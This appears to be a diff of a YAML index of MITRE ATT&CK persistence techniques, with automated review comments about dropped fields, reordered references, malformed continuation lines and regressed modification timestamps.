x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- SaaS
- Network
- Containers
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -32853,7 +33278,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098
atomic_tests:
- name: Azure - adding user to Azure role in subscription
@@ -33015,138 +33439,137 @@ persistence:
elevation_required: false
T1547.006:
technique:
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-12T17:30:54.170Z'
+ name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+ description: |-
+ Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
+
+ When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+ Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+ Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+ Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
x_mitre_contributors:
- Wayne Silva, F-Secure Countercept
- Anastasios Pingios
- Jeremy Galloway
- Red Canary
- Eric Kaiser @ideologysec
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: |
+ Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+ Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
+
+ On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'File: File Creation'
+ - 'File: File Modification'
+ - 'Kernel: Kernel Module Load'
+ - 'Process: Process Creation'
+ x_mitre_permissions_required:
+ - root
type: attack-pattern
id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
created: '2020-01-24T17:42:23.339Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1547.006
url: https://attack.mitre.org/techniques/T1547/006
+ external_id: T1547.006
- source_name: Apple Developer Configuration Profile
- url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
September 23, 2021.
+ url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
- source_name: Apple Kernel Extension Deprecation
- url: https://developer.apple.com/support/kernel-extensions/
description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
Alternatives. Retrieved November 4, 2020.
+ url: https://developer.apple.com/support/kernel-extensions/
- source_name: System and kernel extensions in macOS
- url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
March 31, 2022.
+ url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
- source_name: GitHub Reptile
- url: https://github.com/f0rb1dd3n/Reptile
description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
April 9, 2018.
+ url: https://github.com/f0rb1dd3n/Reptile
- source_name: Volatility Phalanx2
- url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+ url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
- source_name: iDefense Rootkit Overview
- url: http://www.megasecurity.org/papers/Rootkits.pdf
description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
- April 6, 2018.
+ September 12, 2024.
+ url: https://www.megasecurity.org/papers/Rootkits.pdf
- source_name: Linux Loadable Kernel Module Insert and Remove LKMs
- url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
description: Henderson, B. (2006, September 24). How To Insert And Remove
LKMs. Retrieved April 9, 2018.
+ url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
- source_name: CrowdStrike Linux Rootkit
- url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
Retrieved December 21, 2017.
+ url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
- source_name: GitHub Diamorphine
- url: https://github.com/m0nad/Diamorphine
description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+ url: https://github.com/m0nad/Diamorphine
- source_name: Securelist Ventir
- url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
your MacOS spy. Retrieved April 6, 2018.'
+ url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
- source_name: User Approved Kernel Extension Pike’s
- url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
Loading…. Retrieved September 23, 2021.
+ url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
- source_name: Linux Kernel Module Programming Guide
- url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
Retrieved April 6, 2018.
+ url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
- source_name: Linux Kernel Programming
- url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
Module Programming Guide. Retrieved April 6, 2018.
+ url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
- source_name: Trend Micro Skidmap
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
Retrieved June 4, 2020.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
- source_name: Purves Kextpocalypse 2
- url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
. Retrieved September 23, 2021.
+ url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
- source_name: RSAC 2015 San Francisco Patrick Wardle
- url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
Retrieved April 6, 2018.
+ url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- source_name: Synack Secure Kernel Extension Broken
- url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
Extension Loading’ is Broken. Retrieved April 6, 2018.
+ url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
- source_name: Wikipedia Loadable Kernel Module
- url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
April 9, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
-
- When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
- Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
- Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
- Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
- x_mitre_detection: |
- Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
- Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
-
- On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'File: File Creation'
- - 'File: File Modification'
- - 'Kernel: Kernel Module Load'
- - 'Process: Process Creation'
- x_mitre_permissions_required:
- - root
- x_mitre_attack_spec_version: 2.1.0
+ url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.006
atomic_tests: []
T1574.013:
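Review bot: the continuation lines of the multi-line description and detection blocks in this hunk ('and kextunload', 'commands. Kexts need to be signed ...', ', insmod', ', lsmod', 'On RHEL and CentOS based systems ...') carry no '+' or '-' marker, so as displayed the hunk is not a well-formed unified diff and the counts in its header (138 old lines, 137 new lines) cannot be reconciled with what is shown. The breaks fall exactly where the upstream text has inline code spans (kextload, modprobe, /lib/modules, kext_policy), which suggests those spans were stripped and turned into line breaks somewhere between the source bundle and this file; please confirm the on-disk YAML keeps each sentence on one line, because a literal block ('|-' / '|') would otherwise embed those stray newlines into the rendered description. Beyond that, nearly all of the added lines are the same content re-emitted in a different key order (url moved after description in every external reference); the substantive changes are the modified date, x_mitre_attack_spec_version 2.1.0 to 3.2.0, the added created_by_ref and revoked: false, and the iDefense reference moving to https with a new retrieval date, which is what the PR description should call out.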
@@ -33183,7 +33606,7 @@ persistence:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -33209,12 +33632,10 @@ persistence:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
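Review bot: x_mitre_attack_spec_version: 2.1.0 is removed from T1574.013 here together with spec_version, but unlike the other objects in this patch no replacement x_mitre_attack_spec_version: 3.2.0 is added anywhere in the hunk, and the preceding hunk moved this object's modified date backwards from 2022-05-11 to 2022-03-22. Please check whether the regenerated T1574.013 still carries x_mitre_attack_spec_version elsewhere in the object; if it does not, the object is now inconsistent with the rest of the file and with any consumer that reads that field. The same removal without a visible replacement happens for T1542.004 in the @@ -33343,41 hunk below.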
@@ -33292,9 +33713,8 @@ persistence:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests: []
T1542.004:
@@ -33321,7 +33741,7 @@ persistence:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T02:18:19.568Z'
name: ROMMONkit
description: |-
Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -33343,41 +33763,10 @@ persistence:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1137.003:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
- type: attack-pattern
- created: '2019-11-07T20:06:02.624Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.003
- url: https://attack.mitre.org/techniques/T1137/003
- - source_name: SensePost Outlook Forms
- url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
- description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
- February 4, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
- - source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
- description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
- provides blue teams with the ability to detect Ruler usage against Exchange.
- Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:02:00.782Z'
name: Outlook Forms
description: |-
Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
@@ -33386,22 +33775,49 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'Process: Process Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
+ created: '2019-11-07T20:06:02.624Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/003
+ external_id: T1137.003
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SensePost NotRuler
+ description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+ provides blue teams with the ability to detect Ruler usage against Exchange.
+ Retrieved February 4, 2019.
+ url: https://github.com/sensepost/notruler
+ - source_name: SensePost Outlook Forms
+ description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
+ February 4, 2019.
+ url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
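Review bot: x_mitre_permissions_required (Administrator, User) is removed from T1137.003 and not re-added anywhere in this hunk, whereas the other removed fields (type, id, created, created_by_ref, external_references, object_marking_refs, x_mitre_attack_spec_version, x_mitre_modified_by_ref) all reappear below in a new order. T1547.006 in the same patch keeps its x_mitre_permissions_required: root, so this is not a uniform field drop. Please confirm the upstream object genuinely no longer has the field rather than the generator losing it; the only other data changes visible are x_mitre_version 1.1 to 1.2 and the platform change from Office 365 to Office Suite.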
T1574:
technique:
@@ -33467,7 +33883,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.005:
technique:
@@ -33541,11 +33956,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -33562,7 +33976,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -33572,7 +33985,7 @@ persistence:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -33581,19 +33994,17 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
@@ -33641,11 +34052,12 @@ persistence:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -33674,24 +34086,26 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
@@ -33726,9 +34140,6 @@ persistence:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1505.004:
technique:
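Review bot: of the three lines removed from the tail of T1556.006, `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref` are re-emitted earlier in the same object (the `+` lines in the preceding hunk), so the only real loss here is `spec_version: '2.1'`, consistent with the rest of the diff.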
@@ -33788,7 +34199,7 @@ persistence:
description: Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor
on Targets in the Middle East. Retrieved July 6, 2018.
source_name: Unit 42 RGDoor Jan 2018
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T15:06:24.161Z'
name: IIS Components
description: |-
Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: Get{Extension/Filter}Version
, Http{Extension/Filter}Proc
, and (optionally) Terminate{Extension/Filter}
. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)
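Review bot: the `modified` timestamp for T1505.004 moves backwards, from `2022-04-25T14:00:00.188Z` to `2021-10-17T15:06:24.161Z`. The same regression recurs for T1547.002, T1546.015, T1574.009, T1037.005, T1037.003, T1197, T1546.010, T1543.001 and T1505 further down, and in every case the removed value carries the `.188Z` millisecond suffix (mostly `T14:00:00.188Z`), which looks like a batch-assigned timestamp rather than a real edit time, while the new values have ordinary precision. That is plausible if the previous index was generated from a rewritten bundle, but please confirm the new values match the upstream STIX objects and that nothing sorts, dedupes or caches on `modified`, since a backwards move would read as a stale object to such logic.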
